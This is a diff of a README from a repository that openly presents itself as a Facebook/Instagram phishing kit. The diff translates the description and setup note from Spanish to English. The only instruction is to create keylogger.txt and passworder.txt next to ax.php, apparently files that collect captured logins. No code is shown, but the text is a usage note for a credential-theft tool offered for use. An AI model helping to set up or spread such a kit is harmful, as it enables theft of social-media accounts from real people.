LiLPandemio/phishing-facebook-instagram/README.md

 # phishing-facebook-instagram
-Kit de phishing para facebook e instagram.
+Facebook/Instagram phishing kit

 <h2>How to use</h2>
-Crea los archivos keylogger.txt y passworder.txt y ponlos junto a ax.php
+Create files keylogger.txt and passworder.txt put them together with ax.php